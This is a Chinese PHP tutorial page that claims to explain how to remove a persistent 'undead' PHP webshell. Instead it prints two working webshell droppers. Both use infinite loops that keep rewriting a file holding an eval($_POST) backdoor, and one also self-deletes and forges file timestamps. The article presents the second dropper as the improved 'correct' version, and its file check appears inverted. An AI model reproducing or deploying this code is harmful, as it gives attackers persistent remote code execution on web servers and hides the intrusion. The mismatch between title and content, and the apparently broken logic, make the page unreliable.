首頁 >後端開發 >PHP問題 >php不死馬如何刪除

php不死馬如何刪除

(*-*)浩
(*-*)浩原創
2019-10-10 10:13:414675瀏覽

php不死馬如何刪除

什麼是不死馬?

記憶體馬,通俗講就是不死馬,就是會運行一段永遠不退出的程式常駐在PHP進程裡,無限執行。

產生過程  (推薦學習:PHP影片教學

不死馬.php → 上傳到server → server執行檔→ server本地無限循環生成(一句話.php)

網路上流傳的不死馬

<?php ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = &#39;2.php&#39;;
$code = &#39;<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>&#39;;while (1){
    file_put_contents($file,$code);
    system(&#39;touch -m -d "2018-12-01 09:10:12" .2.php&#39;);
    usleep(5000);
} 
?>

網路上流傳的不死馬,while裡面只是並沒有判斷了這個文件是不是存在,那我只需要把這個檔案中的shell註解掉就可以繞過你的記憶體木馬了。

正確的姿勢應該是這樣 :

Copy<?php
 ignore_user_abort(true);
 set_time_limit(0);
 $file = &#39;c.php&#39;;
 $code = base64_decode(&#39;PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+&#39;); while(true) {     if(md5(file_get_contents($file))===md5($code)) {
         file_put_contents($file, $code);
     }
     usleep(50);
 }?>

以上是php不死馬如何刪除的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn